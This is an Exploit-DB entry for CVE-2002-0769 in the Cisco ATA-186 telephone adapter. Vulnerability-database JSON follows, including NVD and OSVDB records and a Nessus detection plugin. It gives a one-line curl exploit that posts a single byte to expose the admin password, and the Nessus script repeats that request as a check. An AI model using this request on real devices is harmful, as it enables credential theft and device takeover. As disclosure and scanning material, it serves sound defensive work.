source: http://www.securityfocus.com/bid/4711/info
The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.
Reportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.
curl -d a http://ata186.example.com/dev
{"id": "EDB-ID:21441", "hash": "a2288d1f98c9df16be35a7c8b0b0182a", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability", "description": "Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability. CVE-2002-0769. Remote exploit for hardware platform", "published": "2002-05-09T00:00:00", "modified": "2002-05-09T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/21441/", "reporter": "Patrick Michael Kane", "references": [], "cvelist": ["CVE-2002-0769"], "lastseen": "2016-02-02T16:28:43", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0769"]}, {"type": "osvdb", "idList": ["OSVDB:8849", "OSVDB:8850"]}, {"type": "nessus", "idList": ["CISCO_ATA186_PASSWORD_CIRCUMVENT.NASL"]}], "modified": "2016-02-02T16:28:43"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/21441/", "sourceData": "source: http://www.securityfocus.com/bid/4711/info\r\n\r\nThe Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration.\r\n\r\nReportedly, HTTP requests consisting of a single character will cause the device to disclose sensitive configuration information, including the password to the administrative web interface.\r\n\r\ncurl -d a http://ata186.example.com/dev ", "osvdbidlist": ["8849"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2016-09-03T03:27:01", "bulletinFamily": "NVD", "description": "The web-based configuration interface for the Cisco ATA 186 Analog Telephone Adaptor allows remote attackers to bypass authentication via an HTTP POST request with a single byte, which allows the attackers to (1) obtain the password from the login screen, or (2) reconfigure the adaptor by modifying certain request parameters.", "modified": "2008-09-05T16:28:54", "published": "2002-08-12T00:00:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0769", "id": "CVE-2002-0769", "title": "CVE-2002-0769", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/ata186-password-disclosure.shtml)\n[Related OSVDB ID: 8850](https://vulners.com/osvdb/OSVDB:8850)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-05/0083.html\nISS X-Force ID: 9056\n[CVE-2002-0769](https://vulners.com/cve/CVE-2002-0769)\nBugtraq ID: 4712\n", "modified": "2002-05-09T00:00:00", "published": "2002-05-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8849", "id": "OSVDB:8849", "type": "osvdb", "title": "Cisco ATA 186 Adaptor Web Configuration Remote Password Disclosure", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.cisco.com/warp/public/707/ata186-password-disclosure.shtml)\n[Related OSVDB ID: 8849](https://vulners.com/osvdb/OSVDB:8849)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-05/0083.html\nISS X-Force ID: 9056\n[CVE-2002-0769](https://vulners.com/cve/CVE-2002-0769)\nBugtraq ID: 4712\n", "modified": "2002-05-09T00:00:00", "published": "2002-05-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8850", "id": "OSVDB:8850", "type": "osvdb", "title": "Cisco ATA 186 Adaptor Web Configuration Remote Parameter Modification", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-01-16T20:05:16", "bulletinFamily": "scanner", "description": "The remote host appears to be a Cisco ATA-186 - an analog telephone\nadapter used to interface analog telephones to VoIP networks.\n\nThe adapter is configured via a web interface that has a security\nbypass vulnerability. It is possible to bypass authentication by\nsending an HTTP POST request with a single byte, which could allow\na remote attacker to take control of the device.", "modified": "2018-11-15T00:00:00", "published": "2002-06-05T00:00:00", "id": "CISCO_ATA186_PASSWORD_CIRCUMVENT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11012", "title": "Cisco ATA-186 Password Circumvention / Recovery", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: this domain no longer exists)\n# Added BugtraqID and CAN\n#\n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11012);\n script_bugtraq_id(4711, 4712);\n script_version (\"1.27\");\n script_cve_id(\"CVE-2002-0769\");\n script_name(english:\"Cisco ATA-186 Password Circumvention / Recovery\");\n script_summary(english:\"CISCO check\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote telephone adapter has a security bypass vulnerability.\"\n );\n script_set_attribute( attribute:\"description\", value:\n\"The remote host appears to be a Cisco ATA-186 - an analog telephone\nadapter used to interface analog telephones to VoIP networks.\n\nThe adapter is configured via a web interface that has a security\nbypass vulnerability. It is possible to bypass authentication by\nsending an HTTP POST request with a single byte, which could allow\na remote attacker to take control of the device.\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2002/May/92\"\n );\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040329-ata-password-disclosure\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97d3ed5d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply the patch referenced in the vendor's advisory.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2004/03/29\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/h:cisco:ata-186\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english: \"CISCO\");\n script_dependencie(\"find_service1.nasl\", \"no404.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\n\n\nif (! get_port_state(port))exit(0);\n\n\nr = http_send_recv3( port: port, item:\"/dev/\", method: \"GET\",\t\n \t\t username: \"\", password: \"\" );\nif (isnull(r)) exit(0);\nif (r[0] !~ \"^HTTP[0-9]\\.[0-9] 403 \") exit(0);\n\nr = http_send_recv3( port: port, item:\"/dev/\", method: \"POST\",\n \t\t username: \"\", password: \"\", data: \"a\");\nif (r =~ \"^HTTP[0-9]\\.[0-9] 200 \") security_hole(port);\n\n\n\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
